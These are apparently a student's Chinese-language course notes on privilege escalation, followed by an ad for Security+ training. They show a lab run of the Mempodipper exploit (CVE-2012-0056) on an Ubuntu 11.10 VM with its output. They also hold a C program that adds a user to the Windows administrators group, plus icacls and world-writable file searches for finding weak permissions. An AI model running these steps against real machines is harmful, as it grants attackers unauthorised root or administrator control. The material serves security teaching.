【安全牛学习笔记】利用配置不当提权

┃利用漏洞提权

┃Ubuntu11.10 

┃http://old-releases.ubuntu.com/releases/11.10/

┃gcc 

┃sudo apt-cdrom add && sudo apt-get install gcc

┃gcc 18411.c -o exp 

┃CVE-2012-0056 

┃/proc/pid/mem

┃kernels >=2.6.39 

┃http://blog.zx2c4.com/749 

root@kali:~# searchesploit cve-2012-0056

--------------------------------------------- ----------------------------------

 Exploit Title                               |  Path

                                             |(/usr/share/exploitdb/platforms)

--------------------------------------------- ----------------------------------

--------------------------------------------- ----------------------------------

root@kali:~# searchesploit 18411.c

--------------------------------------------- ----------------------------------

 Exploit Title                               |  Path

                                             |(/usr/share/exploitdb/platforms)

--------------------------------------------- ----------------------------------

Linux kernel <= 2.6.39 (32-bit & 64-bit) - Mempodipper Local Root (1)

--------------------------------------------- ----------------------------------

root@kali:~# scp /usr/share/exploitdb/platforms/linux/local/18411.c [email protected]:home/yuanfh

The authenticaity of host '192.168.1.149(192.168.1.149)' can't be established.

ECDSA key fingerprint is 91:03:af:b1:a3:db:a3:db:94:88:a6:94:bc:a7:bc:b2:f5:fd.

Are you sure you want to continue connecting(yes/no)? yes

Warning: Permanently added '192.168.1.149' (ECDSA) to the list of known hosts.

[email protected]'s password:

18411.c

yuanfh@usrv:~$ ls

18411.c

yuanfh@usrv:~$ gcc 18411.c -o exp

yuanfh@usrv:~$ ls

18411.c  exp

yuanfh@usrv:~$ chmod +x exp

yuanfh@usrv:~$ ls

18411.c  exp

yuanfh@usrv:~$ w

 19:16:48 up 8 min , 2 users, load average: 0.00, 0.00, 0.00

USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT

yuanfh   tty1                    19:09    7:07  0.71s  0.62s -bash

yuanfh   pts/0    192.168.1.118    19:11    0.00s 0.53s  0.00s w

yuanfh@usrv:~$ ./exp

===============================

=          Mempodipper        =

=           by zx2c4          =

=          Jan 21, 2012       =

===============================

[+] Waiting for transferred fd in parent.

[+] Executing child from child fork.

[+] Opening parent men /proc/1044/men in child.

[+] Sending fd 3 to parent.

[+] Received fd at 5. 

[+] Assigning fd 5 to stderr.

[+] Reading su for exit@plt.

[+] Resolved exit@plt to 0x8049520.

[+] Calculating su padding.

[+] Seeking to offset 0x8049514.

[+] Excuting su with shellcode.

yuanfh@usrv:~$ ls /

bin    etc        lib         mnt   root  selinux  tmp  vmlinuz

boot   home       lost+found  opt   run   srv      vsr

dev    initrd.img media       proc  sbin  sys      var

yuanfh@usrv:~$ ls /mnt/

yuanfh@usrv:~$ ls /media/

cdrom

yuanfh@usrv:~$ ls /media/cdrom/

yuanfh@usrv:~$ sudo mount /dev/cdrom /media/cdrom

mount: black device /dev/sr0 is write-protected, mounting read-only

yuanfh@usrv:~$ ls /media/cdrom/

boot          dists   install   md5sum.txt  pool     REAIME.diskdefines

cdromupgrade  doc     isolinux  pics        preseed  ubuntu

yuanfh@usrv:~$ cat /etc/apt/soures.list

deb cdrom:[Ubuntu-Server 11.10 _Oneiric Ocelot_ - Release i386 (20111011)]/ oneiric main restricted

deb http://Ubuntu.uestc.edu.cn/ubuntu/ oneiric main restricted universe multiverse

deb http://Ubuntu.uestc.edu.cn/ubuntu/ oneiric-backprots main restricted universe multiverse

deb http://Ubuntu.uestc.edu.cn/ubuntu/ oneiric-proposed main restricted universe multiverse

deb http://Ubuntu.uestc.edu.cn/ubuntu/ oneiric-security main restricted universe multiverse

deb http://Ubuntu.uestc.edu.cn/ubuntu/ oneiric-updates main restricted universe multiverse

deb-src http://ubuntu.uestc.edu.cn/ubuntu/ oneiric main restricted universe multiverse

deb-src http://ubuntu.uestc.edu.cn/ubuntu/ oneiric-backports restricted universe multiverse

deb-src http://ubuntu.uestc.edu.cn/ubuntu/ oneiric-proposed restricted universe multiverse

deb-src http://ubuntu.uestc.edu.cn/ubuntu/ oneiric-security restricted universe multiverse

deb-src http://ubuntu.uestc.edu.cn/ubuntu/ oneiric-updates restricted universe multiverse

yuanfh@usrv:~$ sudo apt-cdrom add

Using CD-ROM mount point /mdeia/cdrom/

Identifying.. [e17dd4e604f0daacc6605e2934bdca-2]

Scanning disc for index files..

Found 2 package indexes, 0 source indexes, 0 translation indexs and 1 signatures

This disc is called:

'Ubuntu-Server 11.10 _Oneiric Ocelot_ -Release i386 (20111011)'

Copying package list...gpgv: Signature made Tue 11 Oct 2011 09:52:05 PM CST using DSA key ID FBB75451

gpgv: Good signature from "Ubuntu CD Image Automatic Signing Key "

Writing new source list

Source list entries for this disc are:

deb cdrom:[Ubuntu-Server 11.10 _Oneiric Ocelot_ - Release i386 (20111011)]/ oneiric main restricted

Repeat this proccess for the rest of the CDs in your set.

W: Skipping noneistent file /media/cdrom/dists/oneiric/main/binary-i386/Packages

W: Skipping noneistent file /media/cdrom/dists/oneiric/main/debain-installer/binary-i386/Packages 

W: Skipping noneistent file /media/cdrom/dists/oneiric/restricted/binary-i386/Packages

W: Skipping noneistent file /media/cdrom/dists/oneiric/restricted/debain-installer/binary-i386/Packages

yuanfh@usrv:~$ sudo apt-get install gcc

╋━━━━━━━━━━━━━━━━━━━━━━━╋

┃利用配置不当提权                              ┃

┃    与漏洞提权相比 更常用的方法               ┃

┃    企业环境                                  ┃

┃    补丁更新的全部已经安装                    ┃

┃    输入变量过滤之外更值得研发关注的安全隐患  ┃

┃    以system权限启动                          ┃

┃    NTFS权限允许users修改删除                 ┃

╋━━━━━━━━━━━━━━━━━━━━━━━╋

╋━━━━━━━━━━━━━━━━━━━━━━━╋

┃用配置不当提权                                ┃

┃    icacls                                    ┃

┃    icacls c:\windows\*.exe /save perm /T     ┃

┃    i586-mingw32msvc-gcc -o admin.exe admin.c ┃

┃    Find                                      ┃

┃    find / -perm 777 -exec ls -l {} \         ┃

╋━━━━━━━━━━━━━━━━━━━━━━━╋

C:\Documents and Settings\Administrator>cd\

C:\>icacls

ICACLS name /save aclfile [/T] [/C] [/L] [/Q]

    将匹配名称的文件和文件夹的 DACL 存储到 aclfile 中以便将来与

    /restore 一起使用。请注意，未保存 SACL、所有者或完整性标签。

ICACLS directory [/substitute SidOld SidNew [...]] /restore aclfile

                 [/C] [/L] [/Q]

    将存储的 DACL 应用于目录中的文件。

ICACLS name /setowner user [/T] [/C] [/L] [/Q]

    更改所有匹配名称的所有者。该选项不会强制更改所有身份；

    使用 takeown.exe 实用程序可实现该目的。

ICACLS name /findsid Sid [/T] [/C] [/L] [/Q]

    查找包含显式提及 SID 的 ACL 的所有匹配名称。

ICACLS name /verify [/T] [/C] [/L] [/Q]

    查找其 ACL 不规范或长度与 ACE 计数不一致的所有文件。

ICACLS name /reset [/T] [/C] [/L] [/Q]

    为所有匹配文件使用默认继承的 ACL 替换 ACL。

ICACLS name [/grant[:r] Sid:perm[...]]

       [/deny Sid:perm [...]]

       [/remove[:g|:d]] Sid[...]] [/T] [/C] [/L]

       [/setintegritylevel Level:policy[...]]

    /grant[:r] Sid:perm 授予指定的用户访问权限。如果使用 :r，

        这些权限将替换以前授予的所有显式权限。

        如果不使用 :r，这些权限将添加到以前授予的所有显式权限。

    /deny Sid:perm 显式拒绝指定的用户访问权限。

        将为列出的权限添加显式拒绝 ACE，

        并删除所有显式授予的权限中的相同权限。

    /remove[:[g|d]] Sid 删除 ACL 中所有出现的 SID。使用

        :g，将删除授予该 SID 的所有权限。使用

        :d，将删除拒绝该 SID 的所有权限。

    /setintegritylevel [(CI)(OI)] 级别将完整性 ACE 显式添加到所有

        匹配文件。要指定的级别为以下级别之一:

            L[ow]

            M[edium]

            H[igh]

        完整性 ACE 的继承选项可以优先于级别，但只应用于

        目录。

    /inheritance:e|d|r

        e - 启用继承

        d - 禁用继承并复制 ACE

        r - 删除所有继承的 ACE

注意:

    Sid 可以采用数字格式或友好的名称格式。如果给定数字格式，

    那么请在 SID 的开头添加一个 *。

    /T 指示在以该名称指定的目录下的所有匹配文件/目录上

        执行此操作。

    /C 指示此操作将在所有文件错误上继续进行。仍将显示错误消息。

    /L 指示此操作在符号链接本身而不是其目标上执行。

    /Q 指示 icacls 应该禁止显示成功消息。

    ICACLS 保留 ACE 项的规范顺序:

            显式拒绝

            显式授予

            继承的拒绝

            继承的授予

    perm 是权限掩码，可以两种格式之一指定:

        简单权限序列:

                N - 无访问权限

                F - 完全访问权限

                M - 修改权限

                RX - 读取和执行权限

                R - 只读权限

                W - 只写权限

                D - 删除权限

        在括号中以逗号分隔的特定权限列表:

                DE - 删除

                RC - 读取控制

                WDAC - 写入 DAC

                WO - 写入所有者

                S - 同步

                AS - 访问系统安全性

                MA - 允许的最大值

                GR - 一般性读取

                GW - 一般性写入

                GE - 一般性执行

                GA - 全为一般性

                RD - 读取数据/列出目录

                WD - 写入数据/添加文件

                AD - 附加数据/添加子目录

                REA - 读取扩展属性

                WEA - 写入扩展属性

                X - 执行/遍历

                DC - 删除子项

                RA - 读取属性

                WA - 写入属性

        继承权限可以优先于每种格式，但只应用于

        目录:

                (OI) - 对象继承

                (CI) - 容器继承

                (IO) - 仅继承

                (NP) - 不传播继承

                (I) - 从父容器继承的权限

示例:

        icacls c:\windows\* /save AclFile /T

        - 将 c:\windows 及其子目录下所有文件的

           ACL 保存到 AclFile。

        icacls c:\windows\ /restore AclFile

        - 将还原 c:\windows 及其子目录下存在的 AclFile 内

          所有文件的 ACL。

        icacls file /grant Administrator:(D,WDAC)

        - 将授予用户对文件删除和写入 DAC 的管理员权限。

        icacls file /grant *S-1-1-0:(D,WDAC)

        - 将授予由 sid S-1-1-0 定义的用户对文件删除和写入 DAC 的权限。

C:\>icacls boot.ini

boot.ini BUILTIN\Power Users:

         BUILTIN\Administrators:

         NT AUTHORITY\SYSTEM:

Successfully processed 1 files; Failed processing 0 files

C:\>icacls c:\WINDOWS\*.exe /save asd /T

root@kali:~# gedit admin.c

-------------------------------------------------------------

#include

int main()

{

    int i;

    i=system ("net localgroup admininistrators a /add");

    return 0;

}

--------------------------------------------------------------

root@kali:~# i586-mingw32msvc-gcc

i586-mingw32msvc-gcc    i586-mingw32msvc-gcov

root@kali:~# i586-mingw32msvc-gcc -o admin.exe admin.c

root@kali:~# file admin.exe

admin.exe: PE32 executable (console) Intel 80386, for MS Windows

root@kali:~# cp admin.exe /media/sf_D_DRIVE/

root@kali:~# ls -l     //查看文件权限

root@kali:~# find / -perm 777 -exec ls -l {} \

该笔记为安全牛课堂学员笔记，想看此课程或者信息安全类干货可以移步到安全牛课堂

Security+认证为什么是互联网+时代最火爆的认证？

      牛妹先给大家介绍一下Security+

        Security+ 认证是一种中立第三方认证，其发证机构为美国计算机行业协会CompTIA ；是和CISSP、ITIL 等共同包含在内的国际 IT 业 10 大热门认证之一，和CISSP偏重信息安全管理相比，Security+ 认证更偏重信息安全技术和操作。

       通过该认证证明了您具备网络安全，合规性和操作安全，威胁和漏洞，应用程序、数据和主机安全，访问控制和身份管理以及加密技术等方面的能力。因其考试难度不易，含金量较高，目前已被全球企业和安全专业人士所普遍采纳。

Security+认证如此火爆的原因？  

       原因一：在所有信息安全认证当中，偏重信息安全技术的认证是空白的， Security+认证正好可以弥补信息安全技术领域的空白 。

      目前行业内受认可的信息安全认证主要有CISP和CISSP，但是无论CISP还是CISSP都是偏重信息安全管理的，技术知识讲的宽泛且浅显，考试都是一带而过。而且CISSP要求持证人员的信息安全工作经验都要5年以上，CISP也要求大专学历4年以上工作经验，这些要求无疑把有能力且上进的年轻人的持证之路堵住。在现实社会中，无论是找工作还是升职加薪，或是投标时候报人员，认证都是必不可少的，这给年轻人带来了很多不公平。而Security+的出现可以扫清这些年轻人职业发展中的障碍，由于Security+偏重信息安全技术，所以对工作经验没有特别的要求。只要你有IT相关背景，追求进步就可以学习和考试。

       原因二： IT运维人员工作与翻身的利器。

       在银行、证券、保险、信息通讯等行业，IT运维人员非常多，IT运维涉及的工作面也非常广。是一个集网络、系统、安全、应用架构、存储为一体的综合性技术岗。虽然没有程序猿们“生当做光棍，死亦写代码”的悲壮，但也有着“锄禾日当午，不如运维苦“的感慨。天天对着电脑和机器，时间长了难免有对于职业发展的迷茫和困惑。Security+国际认证的出现可以让有追求的IT运维人员学习网络安全知识，掌握网络安全实践。职业发展朝着网络安全的方向发展，解决国内信息安全人才的匮乏问题。另外，即使不转型，要做好运维工作，学习安全知识取得安全认证也是必不可少的。

        原因三：接地气、国际范儿、考试方便、费用适中！

CompTIA作为全球ICT领域最具影响力的全球领先机构,在信息安全人才认证方面是专业、公平、公正的。Security+认证偏重操作且和一线工程师的日常工作息息相关。适合银行、证券、保险、互联网公司等IT相关人员学习。作为国际认证在全球147个国家受到广泛的认可。

        在目前的信息安全大潮之下，人才是信息安全发展的关键。而目前国内的信息安全人才是非常匮乏的，相信Security+认证一定会成为最火爆的信息安全认证。

 近期，安全牛课堂在做此类线上培训，感兴趣可以了解